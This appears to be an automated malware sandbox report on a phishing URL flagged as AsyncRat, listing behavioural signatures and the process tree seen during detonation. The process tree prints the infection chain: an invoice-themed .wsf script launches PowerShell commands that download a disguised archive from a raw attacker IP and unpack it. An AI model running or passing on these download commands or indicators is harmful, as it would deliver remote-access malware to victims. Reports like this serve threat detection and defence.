Analysis Overview
Threat Level: Known bad
The file https://api.getwemail.io/redirect-to/9cdc304a-b51f-4832-90f8-ef21825e30e9:01c8ea7ad58cbd5ea4e827d806068608/8006b2393b77ce204f6a2513f4d63334?email_id=4730d583-7964-45c8-8c12-c2c79e860582 was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Enumerates connected drives
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-18 18:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 18:29
Reported
2024-06-18 18:31
Platform
win10-20240404-en
Max time kernel
114s
Max time network
110s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
| N/A | N/A | C:\Users\Public\AutoHotkey.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5000 set thread context of 2636 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 2844 set thread context of 2984 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 4688 set thread context of 2532 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 2224 set thread context of 2380 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632089863041416" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://api.getwemail.io/redirect-to/9cdc304a-b51f-4832-90f8-ef21825e30e9:01c8ea7ad58cbd5ea4e827d806068608/8006b2393b77ce204f6a2513f4d63334?email_id=4730d583-7964-45c8-8c12-c2c79e860582
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff08cb9758,0x7fff08cb9768,0x7fff08cb9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 --field-trial-handle=1764,i,16044625434997706430,2553548474295935174,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "E:\Invoice#4241079085.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.26.108.213:222/gov.jpg' -Destination 'C:\Users\Public\bbbb.zip'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
